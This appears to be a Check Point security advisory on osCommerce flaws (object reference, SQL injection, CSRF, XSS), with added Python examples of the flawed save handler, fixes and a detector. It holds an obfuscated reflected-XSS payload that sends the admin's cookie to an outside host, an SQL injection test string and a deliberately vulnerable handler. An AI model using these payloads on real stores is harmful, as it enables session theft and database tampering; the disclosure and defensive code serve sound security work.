Who Really Controls Your Online Store?

Check Point researchers Avi Gimpel, Liad Mizrachi and Oded Vanunu recently discovered critical vulnerabilities in the osCommerce platform.

These vulnerabilities can lead to a full system compromise, with an outside agent gaining control over the osCommerce administration panel and access to the data of the platform stores’ members and customers. These vulnerabilities affect over 260,000 online shops.

About osCommerce

osCommerce provides the tools to create your very own online store to sell products and services to customers worldwide. osCommerce manages a thriving community of store owners, developers, and service providers who interact with and assist each other at every stage. For example, osCommerce worked in close collaboration with PayPal to provide updated PayPal payment modules and bundled all PayPal modules.

Check Point researchers often discover and find ways to protect against security vulnerabilities before malicious actors are able to exploit them. Liad Mizrachi, Security Expert at Check Point Software Technologies, said, “Check Point is committed to ensuring the security of all organizations. As such, we are obligated to raise awareness of the vulnerabilities that can affect the security of consumers and their businesses.”

Technical Details:

The following attack vectors were discovered during our research:

  • Insecure Object Reference
  • CSRF
  • Stored XSS
  • Reflected XSS


Insecure Object Reference

  • An attacker who would normally be blocked from accessing the Admin Cpanel and performing other malicious actions can gain entry by editing the DB column values.
  • The vulnerable file: admin\modules\modules.php


Vulnerability Diagnostic


The Insecure Object Reference vulnerability we found is based on abusing the configuration table (Figure 1). This table is responsible for many critical settings and actions:

Figure 1 – Configuration table

For each configuration_key there is a corresponding configuration_value.

To understand what each key does (osCommerce is open source), look at the configuration_description column of the key in question.

Our exploit uses the Modules option, which is where the vulnerable IOR request is sent.

The code behind the Modules option is located at: admin\modules\modules.php

Now let’s take a look at the osCommerce Admin panel:


Figure 2 – Admin Cpanel and modules options


Whenever a privileged user submits changes to an existing osCommerce module, the server saves the changed values in the configuration DB table (Figure 1).

The request sent as a result of editing the module's fields:


Figure 3 – Change modules’ fields request


To facilitate the process, let’s decode the post data request to make it more readable:


We can easily find that


are both values in the configuration_key column. The values True and vvv are in the configuration_value column. The POST request (Figure 3) was sent with the URL parameter action="save".

Now let’s dive deeper into the server side code, to see what’s behind the post request (Figure 3):

Figure 4 – Server side, building SQL query based on user input


Analyzing the code shows that osCommerce iterates over the submitted configuration array and, on every iteration, builds and executes an SQL query from the submitted $key and $value pair.

This is the DB query sent on the first iteration of the loop:

"update configuration set configuration_value = True where configuration_key = MODULE_SOCIAL_BOOKMARKS_EMAIL_STATUS"


By changing the keys


the server will obtain the given values under a different key.

To examine the insecure object reference, here is an example of the same request, but with a different key:

Figure 5 – Exploiting using insecure object reference


The server will update the configuration table, setting configuration_value to "AVIG" where the configuration_key column equals "STORE_OWNER".

Attack Implications

The vulnerable POST request above (Figure 5) has no CSRF token protection. This allows the attacker to create a malicious HTML form that submits the vulnerable POST request, with the payload, to the osCommerce server through the admin user's browser. The request is sent when the admin visits the malicious page. (The osCommerce admin must be authenticated to the admin panel while the attack executes.)

As mentioned above, the configuration table holds all critical system data and drives critical processes. Rewriting the values of specific table keys blocks all admin cpanel access. The only way to regain access to the cpanel is to restore the DB and/or the specific key values (if they are known).


SQL Injection

  • The current vulnerability allows the attacker to access and update the osCommerce DB.
  • The vulnerable file: admin\modules\modules.php


Vulnerability Diagnostic

  • The same modules.php file is vulnerable to SQLI.
  • osCommerce does not apply any sanitization to the user input: it reads the user data from $HTTP_POST_VARS['configuration'] without calling the regular osCommerce sanitization function.

Figure 6 – SQLI Vulnerable Code

The osCommerce sanitization function for SQL queries:

Figure 7 – osCommerce Sanitation Function


Testing the vector against the osCommerce cpanel produces an SQL error in the response:

Figure 8 – SQLI Server error


Submitting the request with a valid injection payload [' and '1'='1] results in a redirect and the predicted result:

Figure 9 – Successful SQLI


Attack Implications


Using the current SQLI, the attacker can access and update the osCommerce DB.

When we attempted to exploit the DB using this vulnerability, we had a problem: the vulnerable SQL file (modules.php) is blocked against simple users and open only to users with Admin privileges. What could we do to get around this?



(1) Retrieving the DB tables

If the server's CORS configuration allows requests from foreign domains, the attacker can create a malicious web page on his own domain that sends an Ajax request containing the vulnerable POST request (with the required payload). The attack executes through the osCommerce admin when he visits the malicious page, and the attacker receives the osCommerce server's response via the Ajax object.

(The Admin user should be authenticated to the osCommerce at the time of the exploit execution).

(2) One-Time Injection

We have established that there is no CSRF token protection. This allows the attacker to create a malicious HTML form that submits the vulnerable POST request, with the payload, to the osCommerce server through the admin user. The attacker can use this vulnerability as a one-time injection to modify or destroy DB table columns, without being able to retrieve the data (as in the previous option).

(3) Using the Stored XSS (see the Stored XSS section).
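The update loop in modules.php (Figure 4) and the unsanitized $HTTP_POST_VARS['configuration'] input (Figure 6) are two faces of the same handler, so one model covers both. The following Python example is added here and is not osCommerce code: it imitates the PHP save handler against an in-memory SQLite stand-in for the configuration table, with a vulnerable version that pastes each posted key and value into the UPDATE string (any key can be targeted, and a quote in the key or value breaks out of the query) and a hardened version that only accepts keys on the allow-list of the module being edited and binds the value as a parameter. The key and value names come from Figures 1 and 5 and the first-loop query above; MODULE_KEYS, the module name and the seed rows are assumptions.

```python
import sqlite3

# Constructed stand-in for the osCommerce `configuration` table (Figure 1):
# one row per configuration_key, holding its configuration_value.
SCHEMA = """
CREATE TABLE configuration (
    configuration_key   TEXT PRIMARY KEY,
    configuration_value TEXT NOT NULL
);
"""
SEED = [
    ("MODULE_SOCIAL_BOOKMARKS_EMAIL_STATUS", "False"),
    ("STORE_OWNER", "Original Owner"),
]

# Hypothetical allow-list: the keys each module page is permitted to edit.
# In a real fix this comes from the module definition; it is assumed here.
MODULE_KEYS = {
    "social_bookmarks_email": {"MODULE_SOCIAL_BOOKMARKS_EMAIL_STATUS"},
}


def fresh_db() -> sqlite3.Connection:
    """Create and seed the in-memory configuration table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany("INSERT INTO configuration VALUES (?, ?)", SEED)
    conn.commit()
    return conn


def config_value(conn: sqlite3.Connection, key: str):
    """Read back one configuration_value (parameterised lookup)."""
    row = conn.execute(
        "SELECT configuration_value FROM configuration WHERE configuration_key = ?",
        (key,),
    ).fetchone()
    return row[0] if row else None


def save_vulnerable(conn: sqlite3.Connection, posted: dict) -> None:
    """Models the loop in Figure 4: each posted key/value pair is pasted into
    an UPDATE string. Nothing ties the key to the module being edited (IOR),
    and neither side is escaped or bound (SQLi)."""
    for key, value in posted.items():
        sql = (f"update configuration set configuration_value = '{value}' "
               f"where configuration_key = '{key}'")
        conn.execute(sql)
    conn.commit()


def save_hardened(conn: sqlite3.Connection, module: str, posted: dict) -> list:
    """Hardened form: the key must be on the module's allow-list, and the
    query is parameterised so the value is stored literally. Returns the
    rejected keys so the caller can log the attempt."""
    allowed = MODULE_KEYS.get(module)
    if allowed is None:
        raise PermissionError(f"unknown module {module!r}")
    rejected = []
    for key, value in posted.items():
        if key not in allowed:
            rejected.append(key)  # IOR attempt, or injection in the key name
            continue
        conn.execute(
            "UPDATE configuration SET configuration_value = ? WHERE configuration_key = ?",
            (str(value), key),
        )
    conn.commit()
    return rejected


if __name__ == "__main__":
    db = fresh_db()
    save_vulnerable(db, {"STORE_OWNER": "AVIG"})  # the request of Figure 5
    print("vulnerable handler, STORE_OWNER:", config_value(db, "STORE_OWNER"))
    db = fresh_db()
    rejected = save_hardened(db, "social_bookmarks_email",
                             {"STORE_OWNER": "AVIG",
                              "MODULE_SOCIAL_BOOKMARKS_EMAIL_STATUS": "True"})
    print("hardened handler rejected:", rejected,
          "STORE_OWNER:", config_value(db, "STORE_OWNER"))
```

The allow-list is what closes the object-reference hole: parameter binding alone would still let the request name STORE_OWNER, because the key is a legitimate column value, just not one this page should be allowed to touch. The rejected-keys list is worth logging, since a request naming keys outside the module's set is a strong signal of the attack described above.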


CSRF Attack

Create or delete an administrator user using a CSRF attack.


Vulnerability Diagnostic


When we analyzed the New Administrator function, we discovered that requests for adding or deleting a new user in the admin cpanel are handled without any use of CSRF token protection. This can lead to serious security issues.

Deleting an admin user using a GET request:

The admin ID parameter is an auto-incremented number that identifies an administrator user in the administrators DB table.

Figure 10 – CSRF create New Admin user


Attack Implications

Create or delete an administrator via a crafted URL.
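A synchronizer-token check of the kind the page says is missing, as an added Python example (not osCommerce code). It models the administrator create/delete handler: state changes are refused over GET, so a crafted URL alone cannot trigger them, and a POST must carry a token derived from the logged-in session, which a page on another origin cannot read. SERVER_SECRET, the ADMINS table and the admin_id, action, username and csrf_token parameter names are assumptions.

```python
import hashlib
import hmac

# Hypothetical server secret; a real deployment loads it from configuration
# rather than hard-coding it.
SERVER_SECRET = b"constructed-example-secret"

# Constructed administrators table: auto-incremented admin ID -> username,
# modelled on the admin ID parameter described above.
ADMINS = {1: "admin", 2: "helper"}


class CsrfRejected(Exception):
    """Raised when a state-changing admin request fails the CSRF check."""


def issue_token(session_id: str) -> str:
    """Token bound to the logged-in session. The admin form renders it as a
    hidden field; a cross-site page cannot read it, so it cannot forge it."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def check_admin_request(method: str, session_id: str, form: dict) -> bool:
    """Gate for every request that creates or deletes an administrator."""
    # A crafted link is a GET: refuse it for anything that changes state.
    if method.upper() != "POST":
        raise CsrfRejected("administrator changes must be submitted via POST")
    # Constant-time comparison against the token issued for this session.
    supplied = form.get("csrf_token", "")
    if not hmac.compare_digest(supplied, issue_token(session_id)):
        raise CsrfRejected("missing or invalid CSRF token")
    return True


def handle_admin_action(method: str, session_id: str, form: dict) -> tuple:
    """Request handler in miniature: returns (HTTP status, message)."""
    try:
        check_admin_request(method, session_id, form)
    except CsrfRejected as exc:
        return 403, str(exc)
    action = form.get("action")
    if action == "delete":
        admin_id = int(form["admin_id"])
        if admin_id in ADMINS and len(ADMINS) == 1:
            return 409, "refusing to delete the last administrator"
        removed = ADMINS.pop(admin_id, None)
        return (200, f"deleted {removed}") if removed else (404, "no such administrator")
    if action == "create":
        new_id = max(ADMINS, default=0) + 1
        ADMINS[new_id] = form["username"]
        return 200, f"created {new_id}"
    return 400, "unknown action"


if __name__ == "__main__":
    session = "session-abc"
    # The crafted-URL case: a GET with no token is refused before any change.
    print(handle_admin_action("GET", session, {"action": "delete", "admin_id": "2"}))
    # The legitimate form submission carries the session-bound token.
    print(handle_admin_action("POST", session, {"action": "delete", "admin_id": "2",
                                                "csrf_token": issue_token(session)}))
```

Deriving the token from the session ID keeps the example stateless; a per-session random value stored server-side works equally well, and either should be combined with a SameSite cookie attribute on the admin session cookie so the browser does not attach it to cross-site form posts in the first place.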


Stored XSS

Injecting HTML/JS code that will run persistently each time the user visits the web site.


Vulnerability Diagnostic

XSS using POST request



Attack Implications

Injecting persistent HTML/JS code that runs in the browsers of users visiting the site.



Reflected XSS

Injecting HTML/JS code when the user follows a crafted URL while visiting the vulnerable osCommerce site.

XSS using GET request

{eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,108,111,99,97,116,105,111,110,61,39,104,116,116,112,58,47,47,119,119,119,46,97,116,116,97,99,107,101,114,46,99,111,46,105,108,47,63,113,61,39,43,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101));})();%3Effff%3C/h1%3E


The above XSS PoC redirects the user to the malicious site and sends the admin user's cookie concatenated with the site's URI.


Attack Implications

Injecting HTML/JS code into the user browser via the crafted URL.
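Added example, not from the original post: a small detector for the obfuscation used in the reflected XSS PoC above (String.fromCharCode inside eval), written in Python for use over web-server request lines, together with the output-encoding step that closes both the reflected and the stored variant on the rendering side. The sample request lines, the /index.php?search= parameter and the shortened fromCharCode sequence are constructed for the example.

```python
import html
import re
from urllib.parse import unquote

# String.fromCharCode(100,111,...) with any spacing between the codes.
FROMCHARCODE = re.compile(r"String\.fromCharCode\(\s*([\d\s,]*)\)", re.IGNORECASE)
# Markers worth flagging in a decoded query string.
INDICATORS = ("<script", "eval(", "document.cookie", "document.location",
              "onerror=", "onload=")


def decode_charcodes(text: str) -> list:
    """Unfold every String.fromCharCode(...) call into the string it builds."""
    found = []
    for m in FROMCHARCODE.finditer(text):
        codes = [int(c) for c in m.group(1).split(",") if c.strip()]
        found.append("".join(chr(c) for c in codes if 0 <= c <= 0x10FFFF))
    return found


def inspect_request(raw_url: str) -> dict:
    """Percent-decode twice (double encoding is a common evasion), unfold the
    fromCharCode obfuscation, and report which indicators appear."""
    decoded = unquote(unquote(raw_url))
    hidden = decode_charcodes(decoded)
    haystack = (decoded + " " + " ".join(hidden)).lower()
    hits = sorted(i for i in INDICATORS if i in haystack)
    return {"url": raw_url, "hidden_strings": hidden,
            "indicators": hits, "suspicious": bool(hits)}


def scan(requests) -> list:
    """Inspection results for every request line that tripped an indicator."""
    return [r for r in map(inspect_request, requests) if r["suspicious"]]


def render_echo(param: str) -> str:
    """The fix on the rendering side: whatever reflects (or later re-displays)
    the parameter must HTML-encode it so markup is shown, not executed."""
    return html.escape(param, quote=True)


# Constructed sample request lines; path and parameter names are assumptions.
SAMPLE_REQUESTS = [
    "/index.php?cPath=22&page=2",
    "/index.php?search=%3Ch1%3E%3Cscript%3E(function(){eval(String.fromCharCode("
    "100,111,99,117,109,101,110,116,46,99,111,111,107,105,101));})();%3C/script%3E",
]

if __name__ == "__main__":
    for result in scan(SAMPLE_REQUESTS):
        print(result["url"])
        print("  hidden:", result["hidden_strings"])
        print("  indicators:", result["indicators"])
    print(render_echo("<h1>search term</h1>"))
```

The detector only reports; the encoding in render_echo is what actually removes the vulnerability. Matching on the decoded form matters because the raw request line of the PoC above carries the interesting strings only as numeric character codes, which a signature on the literal text "document.cookie" would never see.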


How can I protect against the vulnerability?

  1. Check Point IPS currently protects against exploitation attempts of these vulnerabilities. Protection names:
    1. osCommerce Cross-Site Request Forgery Administrator Deletion
    2. osCommerce Mail Cross-Site Scripting Attempt
    3. osCommerce Configuration SQL Injection Attempt
    4. osCommerce Cross-Site Request Forgery Administrator Creation
    5. osCommerce Configuration Cross-Site Scripting
  2. Vendor Fix